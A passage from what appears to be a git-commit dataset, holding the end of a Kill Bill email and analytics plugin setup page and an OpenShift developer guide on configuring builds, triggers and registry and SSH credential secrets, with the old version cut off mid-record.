payment!\nfailedPaymentSubject=Your recent payment\npaymentRefundAdditionalMessage=Your refund has been processed!\npaymentRefundSubject=Your recent payment\ncompanyName=Acme Corporation\ncompanyAddress=57 Academy Drive\ncompanyCityProvincePostalCode=Oak Creek, WI 53154\ncompanyCountry=US\ninvoicePrefix=INV# \ninvoiceTitle=Invoice\ninvoiceDate=Invoice Date: \ninvoiceAmount=Total: \ninvoiceAmountPaid=Amount Paid: \ninvoiceBalance=Balance: \ninvoiceItemServicePeriod=Service Period\ninvoiceItemDescription=Plan\ninvoiceItemAmount=Amount\npaymentTitle=Payment\npaymentDate=Payment Date: \npaymentAmount=Total: \nsubscriptionCancellationRequestedAdditionalMessage=The following subscription will be cancelled\nsubscriptionCancellationRequestedSubject=Your subscription will be cancelled\nsubscriptionCancellationEffectiveAdditionalMessage=The following subscription has been cancelled\nsubscriptionCancellationEffectiveSubject=Your subscription has been cancelled\nsubscriptionTitle=Subscription\nsubscriptionEndDate=End Date: \nsusbscriptionPlan=Plan: \n----\n\nMore details on how to update these and update the HTML templates are available in the https:\/\/github.com\/killbill\/killbill-email-notifications-plugin[plugin] documentation.\n\n=== Analytics plugin\n\nThe plugin comes with a few pre-configured reports:\n\n* `Subscriptions creation`: count the number of subscriptions being created per day (effective on that day, i.e. pending subscriptions are ignored). Refreshed every hour. The name of the report is `report_new_subscriptions_daily`.\n* `Effective cancellations`: count the number of subscriptions being canceled per day (only effective cancellations are taken into account: end of term cancellations are ignored for instance). Refreshed every hour. The name of the report is `report_cancellations_daily`.\n* `Overdue accounts`: count the number of overdue accounts per day (defined as having a negative balance, i.e. owing money). Refreshed once a day at 6am GMT. The name of the report is `report_overdue_accounts_daily`.\n\nIn order to make these reports active, they must be enabled on a per tenant level. Assuming a `bob\/lazar` tenant, we can active the reports using the following command -- e.g. report=`report_cancellations_daily`:\n\n```\n#\n# Activate report report_cancellations_daily for tenant bob\/lazar:\n#\ncurl -v \\\n-X PUT \\\n-u admin:password \\\n-H \"X-Killbill-ApiKey:bob\" \\\n-H \"X-Killbill-ApiSecret:lazar\" \\\n-H 'Content-Type: application\/json' \\\n-d '{}' \\\n'http:\/\/127.0.0.1:8080\/plugins\/killbill-analytics\/reports\/report_cancellations_daily?shouldRefresh=true'\n```\n\nCustom reports can be added by following our https:\/\/docs.killbill.io\/latest\/userguide_analytics.html[Analytics guide].\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/analytics_reports.png[align=center]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e2532f8ed83b281f628bce291e543538d007454","subject":"Reword sentence","message":"Reword sentence\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"dev_guide\/builds.adoc","new_file":"dev_guide\/builds.adoc","new_contents":"= Builds\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nA link:..\/architecture\/core_concepts\/builds_and_image_streams.html#builds[build] is a process of creating\nrunnable images to be used on OpenShift. There are three build strategies:\n\n- link:..\/architecture\/core_concepts\/builds_and_image_streams.html#source-build[Source-To-Image (S2I)]\n- link:..\/architecture\/core_concepts\/builds_and_image_streams.html#docker-build[Docker]\n- link:..\/architecture\/core_concepts\/builds_and_image_streams.html#custom-build[Custom]\n\n[[defining-a-buildconfig]]\n\n== Defining a BuildConfig\n\nA build configuration describes a single build definition and a set of\nlink:#build-triggers[triggers] for when a new build should be created.\n\nA build configuration is defined by a `*BuildConfig*`, which is a REST object\nthat can be used in a POST to the API server to create a new instance. The\nfollowing example `*BuildConfig*` results in a new build every time a Docker\nimage tag or the source code changes:\n\n.BuildConfig Object Definition\n====\n\n[source,json]\n----\n{\n \"kind\": \"BuildConfig\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"ruby-sample-build\" <1>\n },\n \"spec\": {\n \"triggers\": [ <2>\n {\n \"type\": \"GitHub\",\n \"github\": {\n \"secret\": \"secret101\"\n }\n },\n {\n \"type\": \"Generic\",\n \"generic\": {\n \"secret\": \"secret101\"\n }\n },\n {\n \"type\": \"ImageChange\"\n }\n ],\n \"source\": { <3>\n \"type\": \"Git\",\n \"git\": {\n \"uri\": \"git:\/\/github.com\/openshift\/ruby-hello-world.git\"\n }\n },\n \"strategy\": { <4>\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"ruby-20-centos7:latest\"\n }\n }\n },\n \"output\": { <5>\n \"to\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"origin-ruby-sample:latest\"\n }\n }\n }\n}\n----\n\n<1> This specification will create a new `*BuildConfig*` named\n*ruby-sample-build*.\n<2> You can specify a list of link:#build-triggers[triggers], which cause a new\nbuild to be created.\n<3> The `*source*` section defines the source code repository location. You can\nprovide additional options, such as `*sourceSecret*` or `*contextDir*` here.\n<4> The `*strategy*` section describes the build strategy used to execute the\nbuild. You can specify `*Source*`, `*Docker*` and `*Custom*` strategies here.\nThis above example uses the `*ruby-20-centos7*` Docker image that\nSource-To-Image will use for the application build.\n<5> After the Docker image is successfully built, it will be pushed into the\nrepository described in the `*output*` section.\n====\n\n[[source-to-image-strategy-options]]\n\n== Source-to-Image Strategy Options\n\nThe following options are specific to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#source-build[S2I\nbuild strategy].\n\n[[s2i-force-pull]]\n\n=== Force Pull\n\nBy default, if the builder image specified in the build configuration is\navailable locally on the node, that image will be used. However, to override the\nlocal image and refresh it from the registry to which the image stream points,\ncreate a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"builder-image:latest\" <1>\n },\n \"forcePull\": true <2>\n }\n }\n}\n----\n\n<1> The builder image being used, where the local version on the node may not be\nup to date with the version in the registry to which the image stream points.\n<2> This flag causes the local builder image to be ignored and a fresh version\nto be pulled from the registry to which the image stream points. Setting\n`*forcePull*` to *false* results in the default behavior of honoring the image\nstored locally.\n====\n\n[[incremental-builds]]\n\n=== Incremental Builds\n\nS2I can perform incremental builds, which means it reuses artifacts from\npreviously-built images. To create an incremental build, create a\n`*BuildConfig*` with the following modification to the strategy definition:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"incremental-image:latest\" <1>\n },\n \"incremental\": true <2>\n }\n }\n}\n----\n\n<1> Specify an image that supports incremental builds. The S2I images provided\nby OpenShift do not implement artifact reuse, so setting `*incremental*` to\n*true* will have no effect on builds using those builder images.\n<2> This flag controls whether an incremental build is attempted. If the builder\nimage does not support incremental builds, the build will still succeed, but you\nwill get a log message stating the incremental build was not successful because\nof a missing *_save-artifacts_* script.\n====\n\n[NOTE]\n====\nSee the link:..\/creating_images\/s2i.html[S2I Requirements] topic for information\non how to create a builder image supporting incremental builds.\n====\n\n[[override-builder-image-scripts]]\n\n=== Override Builder Image Scripts\n\nYou can override the *_assemble_*, *_run_*, and *_save-artifacts_*\nlink:..\/creating_images\/s2i.html#s2i-scripts[S2I scripts] provided by the\nbuilder image in one of two ways. Either:\n\n1. Provide an *_assemble_*, *_run_*, and\/or *_save-artifacts_* script in the\n*_.sti\/bin_* directory of your application source repository, or\n\n2. Provide a URL of a directory containing the scripts as part of the strategy\ndefinition. For example:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"builder-image:latest\"\n },\n \"scripts\": \"http:\/\/somehost.com\/scripts_directory\" <1>\n }\n }\n}\n----\n\n<1> This path will have *_run_*, *_assemble_*, and *_save-artifacts_* appended\nto it. If any or all scripts are found they will be used in place of the same\nnamed script(s) provided in the image.\n====\n\n[NOTE]\n====\nFiles located at the `*scripts*` URL take precedence over files located in\n*_.sti\/bin_* of the source repository. See the\nlink:..\/creating_images\/s2i.html[S2I Requirements] topic and the\nlink:https:\/\/github.com\/openshift\/source-to-image\/blob\/master\/docs\/builder_image.md#sti-scripts[S2I\ndocumentation] for information on how S2I scripts are used.\n====\n\n[[configuring-the-source-environment]]\n=== Source Environment\n\nThere are two ways to make environment variables available to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#builds[source build]\nprocess and resulting \\image: link:#environment-files[environment files] and\nlink:#buildconfig-environment[*BuildConfig* environment] values.\n\n[[environment-files]]\n\n==== Environment Files\nSource build enables you to set environment values (one per line) inside your\napplication, by specifying them in a *_.sti\/environment_* file in the source\nrepository. The environment variables specified in this file are present during\nthe build process and in the final docker image. The complete list of supported\nenvironment variables is available in the\nlink:..\/using_images\/overview.html[documentation] for each image.\n\nIf you provide a *_.sti\/environment_* file in your source repository, S2I reads\nthis file during the build. This allows customization of the build behavior as\nthe *_assemble_* script may use these variables.\n\nFor example, if you want to disable assets compilation for your Rails\napplication, you can add `*DISABLE_ASSET_COMPILATION=true*` in the\n*_.sti\/environment_* file to cause assets compilation to be skipped during the\nbuild.\n\nIn addition to builds, the specified environment variables are also available in\nthe running application itself. For example, you can add\n`*RAILS_ENV=development*` to the *_.sti\/environment_* file to cause the Rails\napplication to start in `development` mode instead of `production`.\n\n[[buildconfig-environment]]\n\n==== BuildConfig Environment\nYou can add environment variables to the `*sourceStrategy*` definition of the\n`*BuildConfig*`. The environment variables defined there are visible during the\n*_assemble_* script execution and will be defined in the output image, making\nthem also available to the *_run_* script and application code.\n\nFor example disabling assets compilation for your Rails application:\n\n====\n\n----\n{\n \"sourceStrategy\": {\n ...\n \"env\": [\n {\n \"name\": \"DISABLE_ASSET_COMPILATION\",\n \"value\": \"true\"\n }\n ]\n }\n}\n----\n====\n\n[[docker-strategy-options]]\n\n== Docker Strategy Options\n\nThe following options are specific to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#docker-build[Docker\nbuild strategy].\n\n[[no-cache]]\n\n=== No Cache\n\nDocker builds normally reuse cached layers found on the host performing the\nbuild. Setting the `*nocache*` option to *true* forces the build to ignore\ncached layers and rerun all steps of the *_Dockerfile_*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Docker\",\n \"dockerStrategy\": {\n \"nocache\": true\n }\n }\n}\n----\n====\n\n[[docker-force-pull]]\n\n=== Force Pull\n\nBy default, if the builder image specified in the build configuration is\navailable locally on the node, that image will be used. However, to override the\nlocal image and refresh it from the registry to which the image stream points,\ncreate a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Docker\",\n \"dockerStrategy\": {\n \"forcePull\": true <1>\n }\n }\n}\n----\n\n<1> This flag causes the local builder image to be ignored, and a fresh version\nto be pulled from the registry to which the image stream points. Setting\n`*forcePull*` to *false* results in the default behavior of honoring the image\nstored locally.\n====\n\n\n[[custom-strategy-options]]\n\n== Custom Strategy Options\n\nThe following options are specific to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#custom-build[Custom\nbuild strategy].\n\n[[expose-docker-socket]]\n\n=== Expose Docker Socket\n\nIn order to allow the running of Docker commands and the\nbuilding of Docker images from inside the Docker container, the build container must be bound to an\naccessible socket. Set the `*exposeDockerSocket*` option to *true* to make this occur.\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Custom\",\n \"customStrategy\": {\n \"exposeDockerSocket\": true\n }\n }\n}\n----\n====\n\nifdef::openshift-origin[]\n[[custom-force-pull]]\n\n=== Force Pull\n\nBy default, when setting up the build pod, the build controller checks if the image specified in the build configuration is\navailable locally on the node. If so, that image will be used. However, to override the\nlocal image and refresh it from the registry to which the image stream points,\ncreate a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Custom\",\n \"customStrategy\": {\n \"forcePull\": true <1>\n }\n }\n}\n----\n\n<1> This flag causes the local builder image to be ignored, and a fresh version\nto be pulled from the registry to which the image stream points. Setting\n`*forcePull*` to *false* results in the default behavior of honoring the image\nstored locally.\n====\nendif::openshift-origin[]\n\n[[using-a-proxy-for-git-cloning]]\n\n== Using a Proxy for Git Cloning\nIf your Git repository can only be accessed using a proxy, you can define the\nproxy to use in the `*source*` section of the `*BuildConfig*`. You can configure\nboth a HTTP and HTTPS proxy to use. Both fields are optional.\n\n[NOTE]\n====\nYour source URI must use the HTTP or HTTPS protocol for this to work.\n====\n\n====\n\n[source,json]\n----\n\"source\": {\n \"type\": \"Git\",\n \"git\": {\n \"uri\": \"https:\/\/github.com\/openshift\/ruby-hello-world.git\", <1>\n \"httpProxy\" : \"http:\/\/someproxy.com\", <2>\n \"httpsProxy\" : \"https:\/\/someproxy.com\" <3>\n }\n}\n----\n\n<1> Must be an HTTP or HTTPS URI.\n<2> Specify the HTTP proxy to use.\n<3> Specify the HTTPS proxy to use.\n====\n\n[[starting-a-build]]\n\n== Starting a Build\nManually invoke a build using the following command:\n\n----\n$ oc start-build <BuildConfigName>\n----\n\nRe-run a build using the `--from-build` flag:\n\n----\n$ oc start-build --from-build=<buildName>\n----\n\nSpecify the `--follow` flag to stream the build's logs in stdout:\n\n----\n$ oc start-build <BuildConfigName> --follow\n----\n\n[[canceling-a-build]]\n\n== Canceling a Build\nManually cancel a build using the following command:\n\n----\n$ oc cancel-build <buildName>\n----\n\n[[accessing-build-logs]]\n\n== Accessing Build Logs\nTo allow access to build logs, use the following command:\n\n----\n$ oc build-logs <buildName>\n----\n\n*Log Verbosity*\n\nTo enable more verbose output, pass the `*BUILD_LOGLEVEL*` environment variable\nas part of the `*sourceStrategy*` or `*dockerStrategy*` in a `*BuildConfig*`:\n\n====\n\n----\n{\n \"sourceStrategy\": {\n ...\n \"env\": [\n {\n \"name\": \"BUILD_LOGLEVEL\",\n \"value\": \"2\" <1>\n }\n ]\n }\n}\n----\n\n<1> Adjust this value to the desired log level.\n====\n\nNOTE: A platform administrator can set verbosity for the entire OpenShift\ninstance by passing the `--loglevel` option to the `openshift start` command.\nIf both `--loglevel` and `BUILD_LOGLEVEL` are specified, `BUILD_LOGLEVEL` takes precedence.\n\nAvailable log levels for Source builds are as follows:\n\n[horizontal]\nLevel 0:: Produces output from containers running the *_assemble_* script and all encountered errors. This is the default.\nLevel 1:: Produces basic information about the executed process.\nLevel 2:: Produces very detailed information about the executed process.\nLevel 3:: Produces very detailed information about the executed process, and a listing of the archive contents.\nLevel 5:: Produces everything mentioned on previous levels and additionally provides docker push messages.\n\n[[source-code]]\n\n== Source Code\nThe source code location is one of the required parameters for the\n`*BuildConfig*`. The build uses this location and fetches the source code that\nis later built. The source code location definition is part of the\n`*parameters*` section in the `*BuildConfig*`:\n\n====\n\n----\n{\n \"source\" : {\n \"type\" : \"Git\", <1>\n \"git\" : { <2>\n \"uri\": \"git:\/\/github.com\/openshift\/ruby-hello-world.git\"\n },\n \"contextDir\": \"app\/dir\", <3>\n },\n}\n----\n\n<1> The `*type*` field describes which SCM is used to fetch your source code.\n<2> The `*git*` field contains the URI to the remote Git repository of the\nsource code. Optionally, specify the `*ref*` field to check out a specific Git\nreference. A valid `*ref*` can be a SHA1 tag or a branch name.\n<3> The `*contextDir*` field allows you to override the default location inside\nthe source code repository where the build looks for the application source\ncode. If your application exists inside a sub-directory, you can override the\ndefault location (the root folder) using this field.\n====\n\n[[build-triggers]]\n\n== Build Triggers\nWhen defining a `*BuildConfig*`, you can define triggers to control the\ncircumstances in which the `*BuildConfig*` should be run. The following build\ntriggers are available:\n\n* link:#webhook-triggers[Webhook]\n* link:#image-change-triggers[Image change]\n* link:#config-change-triggers[Configuration change]\n\n[[webhook-triggers]]\n\n=== Webhook Triggers\nWebhook triggers allow you to trigger a new build by sending a request to the\nOpenShift API endpoint. You can define these triggers using\nhttps:\/\/developer.github.com\/webhooks\/[GitHub webhooks] or Generic webhooks.\n\n*GitHub Webhooks*\n\nhttps:\/\/developer.github.com\/webhooks\/creating\/[GitHub webhooks] handle the call\nmade by GitHub when a repository is updated. When defining the trigger, you must\nspecify a link:..\/dev_guide\/secrets.html[`*secret*`] as part of the URL you supply\nto GitHub when configuring the webhook. The `*secret*` ensures that only you and\nyour repository can trigger the build. The following example is a trigger\ndefinition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"GitHub\",\n \"github\": {\n \"secret\": \"secret101\"\n }\n}\n----\n====\n\nThe payload URL is returned as the GitHub Webhook URL by the `describe` command\n(see link:#describe-buildconfig[below]), and is structured as follows:\n\n----\nhttp:\/\/<openshift_api_host:port>\/osapi\/v1\/namespaces\/<namespace>\/buildconfigs\/<name>\/webhooks\/<secret>\/github\n----\n\n*Generic Webhooks*\n\nGeneric webhooks can be invoked from any system capable of making a web\nrequest. As with a GitHub webhook, you must specify a `*secret*` when defining the\ntrigger, and the caller must provide this `*secret*` to trigger the build. The\nfollowing is an example trigger definition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"Generic\",\n \"generic\": {\n \"secret\": \"secret101\"\n }\n}\n----\n====\n\nTo set up the caller, supply the calling system with the URL of the generic\nwebhook endpoint for your build:\n\n----\nhttp:\/\/<openshift_api_host:port>\/osapi\/v1\/namespaces\/<namespace>\/buildconfigs\/<name>\/webhooks\/<secret>\/generic\n----\n\nThe endpoint can accept an optional payload with the following format:\n\n====\n\n----\n{\n type: 'git',\n git: {\n uri: '<url to git repository>',\n ref: '<optional git reference>',\n commit: '<commit hash identifying a specific git commit>',\n author: {\n name: '<author name>',\n email: '<author e-mail>',\n },\n committer: {\n name: '<committer name>',\n email: '<committer e-mail>',\n },\n message: '<commit message>'\n }\n}\n----\n====\n\n[[describe-buildconfig]]\n\n*Displaying a BuildConfig's Webhook URLs*\n\nUse the following command to display the webhook URLs associated with a build\nconfiguration:\n\n----\n$ oc describe bc <name>\n----\n\nIf the above command does not display any webhook URLs, then no webhook trigger\nis defined for that build configuration.\n\n[[image-change-triggers]]\n\n=== Image Change Triggers\nImage change triggers allow your build to be automatically invoked when a new\nversion of an upstream image is available. For example, if a build is based on\ntop of a RHEL image, then you can trigger that build to run any time the RHEL\nimage changes. As a result, the application image is always running on the\nlatest RHEL base image.\n\nConfiguring an image change trigger requires the following actions:\n\n. Define an `*ImageStream*` that points to the upstream image you want to\ntrigger on:\n+\n====\n\n----\n{\n \"kind\": \"ImageStream\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"ruby-20-centos7\"\n }\n}\n----\n====\n+\nThis defines the image stream that is tied to a Docker image repository\nlocated at `_<system-registry>_\/_<namespace>_\/ruby-20-centos7`. The\n`_<system-registry>_` is defined as a service with the name `docker-registry`\nrunning in OpenShift.\n\n. If an image stream is the base image for the build, set the from field in the\nbuild strategy to point to the image stream:\n+\n====\n\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"ruby-20-centos7:latest\"\n },\n }\n }\n}\n----\n====\n+\nIn this case, the `*sourceStrategy*` definition is consuming the `latest` tag of\nthe image stream named `ruby-20-centos7` located within this namespace.\n\n. Define a build with one or more triggers that point to image streams:\n+\n====\n\n----\n{\n \"type\": \"imageChange\", <1>\n \"imageChange\": {}\n}\n{\n \"type\": \"imagechange\", <2>\n \"imageChange\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"custom-image:latest\"\n }\n }\n}\n----\n\n<1> An image change trigger that monitors the `*ImageStream*` and\n`*Tag*` as defined by the build strategy's `*from*` field. The `*imageChange*` part\nmust be empty.\n<2> An image change trigger that monitors an arbitrary image stream. The `*imageChange*`\npart in this case must include a `*from*` field that references the `*ImageStreamTag*` to monitor.\n====\n\nWhen using an image change trigger for the strategy image stream, the generated build\nis supplied with an immutable Docker tag that points to the latest image corresponding\nto that tag. This new image reference will be used by the strategy\nwhen it executes for the build. For other image change triggers that do not\nreference the strategy image stream, a new build will be started, but the build\nstrategy will not be updated with a unique image reference.\n\nIn the example above that has an image change trigger for the strategy, the resulting build will be:\n\n====\n\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"DockerImage\",\n \"name\": \"172.30.17.3:5001\/mynamespace\/ruby-20-centos7:immutableid\"\n }\n }\n }\n}\n----\n====\n\nThis ensures that the triggered build uses the new image that was just pushed to\nthe repository, and the build can be re-run any time with the same inputs.\n\nIn addition to setting the image field for all `*Strategy*` types, for custom\nbuilds, the `OPENSHIFT_CUSTOM_BUILD_BASE_IMAGE` environment variable is checked.\nIf it does not exist, then it is created with the immutable image reference. If\nit does exist then it is updated with the immutable image reference.\n\nIf a build is triggered due to a webhook trigger or manual request,\nthe build that is created uses the `*immutableid*` resolved from the\n`*ImageStream*` referenced by the `*Strategy*`. This ensures that builds\nare performed using consistent image tags for ease of reproduction.\n\n[NOTE]\n====\nImage streams that point to Docker images in v1 Docker registries will only trigger a build\nonce when the image stream tag becomes available and not on subsequent image updates. This is due\nto the lack of uniquely identifiable images in v1 Docker registries.\n====\n\n[[config-change-triggers]]\n=== Configuration Change Triggers\nA configuration change trigger allows a build to be automatically invoked as\nsoon as a new `*BuildConfig*` is created. The following is an example trigger\ndefinition JSON within the `*BuildConfig*`:\n\n====\n\n----\n{\n \"type\": \"ConfigChange\"\n}\n----\n\n====\n\n[NOTE]\n====\nConfiguration change triggers currently only work when creating a new\n`*BuildConfig*`. In a future release, configuration change triggers will also be\nable to launch a build whenever a `*BuildConfig*` is updated.\n====\n\n[#using-docker-credentials-for-pushing-and-pulling-images]\n== Using Docker Credentials for Pushing and Pulling Images\n\nSupply the *_.dockercfg_* file with valid Docker Registry credentials in order to\npush the output image into a private Docker Registry or pull the builder image\nfrom the private Docker Registry that requires authentication. For the OpenShift\nDocker Registry, you don't have to do this because `*secrets*` are generated\nautomatically for you by OpenShift.\n\nThe *_.dockercfg_* JSON file is found in your home directory by default and has\nthe following format:\n\n====\n\n----\n{\n\t\"https:\/\/index.docker.io\/v1\/\": { <1>\n\t\t\"auth\": \"YWRfbGzhcGU6R2labnRib21ifTE=\", <2>\n\t\t\"email\": \"user@example.com\" <3>\n\t}\n}\n----\n\n<1> URL of the registry.\n<2> Encrypted password.\n<3> Email address for the login.\n====\n\nYou can define multiple Docker registry entries in this file. Alternatively, you\ncan also add authentication entries to this file by running the `docker login`\ncommand. The file will be created if it does not exist. Kubernetes provides\nhttps:\/\/github.com\/GoogleCloudPlatform\/kubernetes\/blob\/master\/docs\/design\/secrets.md[`*secret*`],\nwhich are used to store your configuration and passwords.\n\n. Create the `*secret*` from your local *_.dockercfg_* file:\n+\n====\n----\n$ oc secrets new dockerhub ~\/.dockercfg\n----\n====\n+\nThis generates a JSON specification of the `*secret*` named *dockerhub* and\ncreates the object.\n\n. Once the `*secret*` is created, add it to the builder service account:\n+\n====\n----\n$ oc secrets add serviceaccount\/builder secrets\/dockerhub\n----\n====\n\n. Add a `*pushSecret*` field into the `*output*` section of the `*BuildConfig*` and\nset it to the name of the `*secret*` that you created, which in the above example\nis *dockerhub*:\n+\n====\n\n----\n{\n \"parameters\": {\n \"output\": {\n \"to\": {\n \"name\": \"private-image\"\n },\n \"pushSecret\":{\n \"name\": \"dockerhub\"\n }\n }\n }\n}\n----\n====\n\n. Pull the builder Docker image from a private Docker registry by specifying the\n`*pullSecret*` field, which is part of the build strategy definition:\n+\n====\n\n----\n{\n \"strategy\": {\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"DockerImage\",\n \"name\": \"docker.io\/user\/private_repository\"\n },\n \"pullSecret\": {\n \"name\": \"dockerhub\"\n },\n },\n \"type\": \"Source\"\n }\n}\n----\n====\n\n[#using-private-repositories-for-builds]\n== Using Private Repositories for Builds\n\nSupply valid credentials to build an application from a private repository.\nCurrently, only SSH key based authentication is supported. The repository keys\nare located in the `$HOME\/.ssh\/` directory, and are named `id_dsa.pub`,\n`id_ecdsa.pub`, `id_ed25519.pub`, or `id_rsa.pub` by default. Generate SSH key\ncredentials with the following command:\n\n====\n\n----\n$ ssh-keygen -t rsa -C \"your_email@example.com\"\n----\n====\n\nTwo files are created: the public key and a corresponding private key (one of\n`id_dsa`, `id_ecdsa`, `id_ed25519`, or `id_rsa`). With both of these in place,\nconsult your source control management (SCM) system's manual on how to upload\nthe public key. The private key will be used to access your private repository.\n\nA link:dev_guide\/secrets[`*secret*`]\nis used to store your keys.\n\n. Create the `*secret*` first before using the SSH key to access the private\nrepository:\n+\n====\n----\n$ oc secrets new scmsecret ssh-privatekey=$HOME\/.ssh\/id_rsa\n----\n====\n\n\n. Add the `*secret*` to the builder service account:\n+\n====\n\n----\n$ oc secrets add serviceaccount\/builder secrets\/scmsecret\n----\n====\n\n\n. Add a `*sourceSecret*` field into the `*source*` section inside the\n`*BuildConfig*` and set it to the name of the `*secret*` that you created, in\nthis case `*scmsecret*`:\n+\n====\n\n----\n{\n \"apiVersion\": \"v1\",\n \"kind\": \"BuildConfig\",\n \"metadata\": {\n \"name\": \"sample-build\",\n },\n \"parameters\": {\n \"output\": {\n \"to\": {\n \"name\": \"sample-image\"\n }\n },\n \"source\": {\n \"git\": {\n \"uri\": \"git@repository.com:user\/app.git\" <1>\n },\n \"sourceSecret\": {\n \"name\": \"scmsecret\"\n },\n \"type\": \"Git\"\n },\n \"strategy\": {\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"python-33-centos7:latest\"\n }\n },\n \"type\": \"Source\"\n }\n }\n----\n<1> The URL of private repository is usually in the form\n`git@example.com:<username>\/<repository>`.\n====\n","old_contents":"= Builds\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nA link:..\/architecture\/core_concepts\/builds_and_image_streams.html#builds[build] is a process of creating\nrunnable images to be used on OpenShift. There are three build strategies:\n\n- link:..\/architecture\/core_concepts\/builds_and_image_streams.html#source-build[Source-To-Image (S2I)]\n- link:..\/architecture\/core_concepts\/builds_and_image_streams.html#docker-build[Docker]\n- link:..\/architecture\/core_concepts\/builds_and_image_streams.html#custom-build[Custom]\n\n[[defining-a-buildconfig]]\n\n== Defining a BuildConfig\n\nA build configuration describes a single build definition and a set of\nlink:#build-triggers[triggers] for when a new build should be created.\n\nA build configuration is defined by a `*BuildConfig*`, which is a REST object\nthat can be used in a POST to the API server to create a new instance. The\nfollowing example `*BuildConfig*` results in a new build every time a Docker\nimage tag or the source code changes:\n\n.BuildConfig Object Definition\n====\n\n[source,json]\n----\n{\n \"kind\": \"BuildConfig\",\n \"apiVersion\": \"v1\",\n \"metadata\": {\n \"name\": \"ruby-sample-build\" <1>\n },\n \"spec\": {\n \"triggers\": [ <2>\n {\n \"type\": \"GitHub\",\n \"github\": {\n \"secret\": \"secret101\"\n }\n },\n {\n \"type\": \"Generic\",\n \"generic\": {\n \"secret\": \"secret101\"\n }\n },\n {\n \"type\": \"ImageChange\"\n }\n ],\n \"source\": { <3>\n \"type\": \"Git\",\n \"git\": {\n \"uri\": \"git:\/\/github.com\/openshift\/ruby-hello-world.git\"\n }\n },\n \"strategy\": { <4>\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"ruby-20-centos7:latest\"\n }\n }\n },\n \"output\": { <5>\n \"to\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"origin-ruby-sample:latest\"\n }\n }\n }\n}\n----\n\n<1> This specification will create a new `*BuildConfig*` named\n*ruby-sample-build*.\n<2> You can specify a list of link:#build-triggers[triggers], which cause a new\nbuild to be created.\n<3> The `*source*` section defines the source code repository location. You can\nprovide additional options, such as `*sourceSecret*` or `*contextDir*` here.\n<4> The `*strategy*` section describes the build strategy used to execute the\nbuild. You can specify `*Source*`, `*Docker*` and `*Custom*` strategies here.\nThis above example uses the `*ruby-20-centos7*` Docker image that\nSource-To-Image will use for the application build.\n<5> After the Docker image is successfully built, it will be pushed into the\nrepository described in the `*output*` section.\n====\n\n[[source-to-image-strategy-options]]\n\n== Source-to-Image Strategy Options\n\nThe following options are specific to the\nlink:..\/architecture\/core_concepts\/builds_and_image_streams.html#source-build[S2I\nbuild strategy].\n\n[[s2i-force-pull]]\n\n=== Force Pull\n\nBy default, if the builder image specified in the build configuration is\navailable locally on the node, that image will be used. However, to override the\nlocal image and refresh it from the registry to which the image stream points,\ncreate a `*BuildConfig*` with the `*forcePull*` flag set to *true*:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n \"kind\": \"ImageStreamTag\",\n \"name\": \"builder-image:latest\" <1>\n },\n \"forcePull\": true <2>\n }\n }\n}\n----\n\n<1> The builder image being used, where the local version on the node may not be\nup to date with the version in the registry to which the image stream points.\n<2> This flag causes the local builder image to be ignored and a fresh version\nto be pulled from the registry to which the image stream points. Setting\n`*forcePull*` to *false* results in the default behavior of honoring the image\nstored locally.\n====\n\n[[incremental-builds]]\n\n=== Incremental Builds\n\nS2I can perform incremental builds, which means it reuses artifacts from\npreviously-built images. To create an incremental build, create a\n`*BuildConfig*` with the following modification to the strategy definition:\n\n====\n\n[source,json]\n----\n{\n \"strategy\": {\n \"type\": \"Source\",\n \"sourceStrategy\": {\n \"from\": {\n 